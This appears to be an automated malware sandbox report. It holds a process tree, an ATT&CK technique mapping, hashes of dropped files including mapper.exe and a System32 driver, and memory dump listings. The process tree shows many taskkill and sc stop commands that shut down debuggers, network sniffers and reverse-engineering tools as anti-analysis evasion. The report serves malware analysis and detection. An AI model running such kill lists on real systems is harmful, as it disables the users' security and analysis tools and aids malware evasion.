C:\Windows\system32\cmd.exe /c cls
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
2⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:5108

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:4120

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:4308

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
2⤵
PID:3104

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerProSdk
3⤵
- Launches sc.exe
PID:4664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
2⤵
PID:1840

C:\Windows\system32\sc.exe
sc stop KProcessHacker3
3⤵
- Launches sc.exe
PID:2848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
2⤵
PID:4536

C:\Windows\system32\sc.exe
sc stop KProcessHacker2
3⤵
- Launches sc.exe
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
2⤵
PID:2436

C:\Windows\system32\sc.exe
sc stop KProcessHacker1
3⤵
- Launches sc.exe
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
2⤵
PID:4812

C:\Windows\system32\sc.exe
sc stop wireshark
3⤵
- Launches sc.exe
PID:2564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:4300

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:4236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4104

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause >nul 2>&1
2⤵
PID:4304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3452

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:4292

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:928

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:1364

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4360

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:4344

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:4940

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
2⤵
PID:4952

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq die*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2864

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebugger.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
2⤵
PID:4616

C:\Windows\system32\taskkill.exe
taskkill /f /im FolderChangesView.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
2⤵
PID:4556

C:\Windows\system32\sc.exe
sc stop HttpDebuggerSdk
3⤵
- Launches sc.exe
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3092

C:\Windows\system32\sc.exe
sc stop npf
3⤵
- Launches sc.exe
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:736

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:2120

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
2⤵
PID:4144

C:\Windows\system32\taskkill.exe
taskkill /f /im Ida64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
2⤵
PID:2216

C:\Windows\system32\taskkill.exe
taskkill /f /im OllyDbg.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
2⤵
PID:2116

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
2⤵
PID:1616

C:\Windows\system32\taskkill.exe
taskkill /f /im Dbg32.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:4812

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:3356

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:5092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:4456

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
2⤵
PID:504

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerUI.exe
3⤵
- Kills process with taskkill
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
2⤵
PID:4508

C:\Windows\system32\taskkill.exe
taskkill /f /im HTTPDebuggerSvc.exe
3⤵
- Kills process with taskkill
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
2⤵
PID:3736

C:\Windows\system32\sc.exe
sc stop HTTPDebuggerPro
3⤵
- Launches sc.exe
PID:4404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:1796

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
2⤵
PID:3804

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
2⤵
PID:3536

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:2872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
2⤵
PID:1096

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
2⤵
PID:2016

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:4972

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:2864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
2⤵
PID:3972

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
2⤵
PID:4580

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
2⤵
PID:1572

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:4280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
2⤵
PID:2344

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
3⤵
- Kills process with taskkill
PID:1372

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1584

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\system32\taskkill.exe
taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
1⤵
- Kills process with taskkill
PID:2132

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
0820611471c1bb55fa7be7430c7c6329

SHA1
5ce7a9712722684223aced2522764c1e3a43fbb9

SHA256
f00d04749a374843bd118b41f669f8b0a20d76526c34b554c3ccac5ebd2f4f75

SHA512
77ea022b4265f3962f5e07a0a790f428c885da0cc11be0975285ce0eee4a2eec0a7cda9ea8f366dc2a946679b5dd927c5f94b527de6515856b68b8d08e435148

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
425e83cc5a7b1f8edfbec7d986058b01

SHA1
432a90a25e714c618ff30631d9fdbe3606b0d0df

SHA256
060a2e5f65b8f3b79a8d4a0c54b877cfe032f558beb0888d6f810aaeef8579bd

SHA512
4bf074de60e7849ade26119ef778fe67ea47691efff45f3d5e0b25de2d06fcc6f95a2cfcdbed85759a5c078bb371fe57de725babda2f44290b4dc42d7b6001af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1fdb408d-59cf-47e2-b672-d37b951bfd76.tmp
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
120B

MD5
1a3b5e436b97f2510e09689feea1826e

SHA1
a30c07ee78a89fd8cd839bc24fd29673c3d96af6

SHA256
362f7fe92e9f4acc118504872bf965981a4236482f4d6ae6b1395bb618d95b05

SHA512
c23314d37a7d0313d9b7c309d5e1dcdad75b1511ab7e052867fbbbc493e38d0c7931965315e688665303ad6b6fe95421b5e3feef31236dddc8f438909d409709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe56960b.TMP
Filesize
48B

MD5
648b2629cb9ec34afd77156e93ad0687

SHA1
f6e6c34a5f51e892e0b3f482c6c5a6422dcd448a

SHA256
abade1394442fff3035ada32f665083460e54da0a1bcbfc5f7c66c3e442504d1

SHA512
fdd035eab3d29d600ea3f74074615a695ec870f1bd190ff0c03fc8ea255ae2afdfe8acffa467dc598b0da68ffcb9a7823f0038ce6fd48e82c6544c637eb7e32f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
d242f74974834de08d9d071f21f295f1

SHA1
f6b7a669068f6cf8219fec6b0ee406251235d45d

SHA256
8a153c53b006c040b9e3d14c10b23b20b3b12424034d7b7262ed036004a6c292

SHA512
7630642a4f0c47f265019ba795f822bd2489cdfdb17f3ed861c74fde57f34e818d75ae70228e2c2cf63e763008e0c8ad2cb298369020d662c427fa43af3490ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
459B

MD5
705a8fa4c8ed2dd431b58a07d1086f58

SHA1
b661283bafda952c34ab519faffe6e64be25ba07

SHA256
94d89f2e2395ecfe7687cde88715ef8c1d6580561b56969aaca3fb2cfcc7ca12

SHA512
87cf28568728bdbe03e5807ea40a3f36620ce97e06684089e2292e3eecb955fd09f4186e63933af9c20c09d787dfab6a052102e441d88f2908e1564f0777bfe4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
4KB

MD5
dd6fce8b40af6a73c4ad9ec9588bd032

SHA1
4fe04c4a6377eb70e873a517442593f75b8ca188

SHA256
5fd37069adb5eca65400de2f3125d79532f63f66683f188626d549050c51b26c

SHA512
03f240506758f90939a105e56ea065ddc0c4bc0865d4c105f53d7226c00293e9a556415a2e561942151d7eb9b8b34d3b7f82e40b9fcf5f5f7c97a6943511ec6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
20ba803e76f5f118241b159398960e15

SHA1
7d4ed2a1b6061c1b9d0ff0e5e292b7f01dca8b7e

SHA256
8eec77465b55f3e171e327e3237ae5cb5baa8b50888d417920e06b7c7db01d3a

SHA512
e6b291d1aecb581d7e8e2d3187bf9f0b60423bd2ca21dfe26302c94be03387ca2284278b6a307ea9cd40d4d18653b856b12b52667e9e553d11240be6c01497bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
24KB

MD5
d53ac35ab3976e67caeed75c4d44ffc1

SHA1
c139ab66d75dc06f98ada34b5baf4d5693266176

SHA256
647867c7236bcb78b7d585b476d82a101a077fac43c78dc59e612253fbf69437

SHA512
391355c71734ded913239a6db10a3202087e756bccc8e29411108f21b3f2460d9a9c606619aadd785285be70eddcf61ef9519441cd387cd3823c1399a6967cc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
9KB

MD5
8fbe335ec183c75714643af33dcb90c6

SHA1
cf28439dd124ade5807bcd1279dff487ba7f4e77

SHA256
6896ea67fd8a4382641562e26b23b04673ab7b78f5701db8da3a67a406947331

SHA512
c345dd7092ec808ca94ca60a4730f70a47567d17b54b272bdf8d6308d4611eee27fb5789639a13f10c09b098c21636e0674e7c29d9669379b9dbc279e9d43a14

Download Submit
C:\Windows\System32\NeptnDriver.sys
Filesize
9KB

MD5
a1367ef701a8b404b03e7437fe67309c

SHA1
e0134d68196f23ef0b48e088e556cf74bb06d173

SHA256
e791c02a1c32806c00c17d76d16d89a06713b66beecf51d644f47d9391f959f1

SHA512
6c3cfeb8949efe5a214b2ce1a910497c5189bab88cbdd3efb287e31f271782e13ca6c3c54342b809d28e99f898d60fc2b609e2fbb3a40a346b8f6f809082f90b

Download Submit
C:\Windows\System32\mapper.exe
Filesize
163KB

MD5
0041a7d5d2f2f207579ebed379346d0c

SHA1
84d494a52ab9fdb21d0f0b380fe66e6d001b61c9

SHA256
e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a

SHA512
12e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8

Download Submit
C:\Windows\System32\mapper.exe
Filesize
163KB

MD5
0041a7d5d2f2f207579ebed379346d0c

SHA1
84d494a52ab9fdb21d0f0b380fe66e6d001b61c9

SHA256
e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a

SHA512
12e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8

Download Submit
\??\pipe\LOCAL\crashpad_2748_GWPMZAEJOPFJREFB
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4904-157-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-134-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp

Filesize
9.4MB

Download
memory/4904-160-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-159-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-158-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-133-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp

Filesize
9.4MB

Download
memory/4904-154-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-153-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-152-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-146-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-147-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-145-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-144-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-137-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-383-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp

Filesize
9.4MB

Download
memory/4904-136-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp

Filesize
9.4MB

Download
memory/4904-135-0x00007FF7C1E60000-0x00007FF7C27CA000-memory.dmp

Filesize
9.4MB

Download
memory/4904-161-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-389-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-390-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-391-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-392-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-394-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-393-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-395-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-397-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-396-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-398-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-399-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-400-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-401-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-402-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-404-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-403-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-405-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download
memory/4904-406-0x00000211BD9A0000-0x00000211BD9A1000-memory.dmp

Filesize
4KB

Download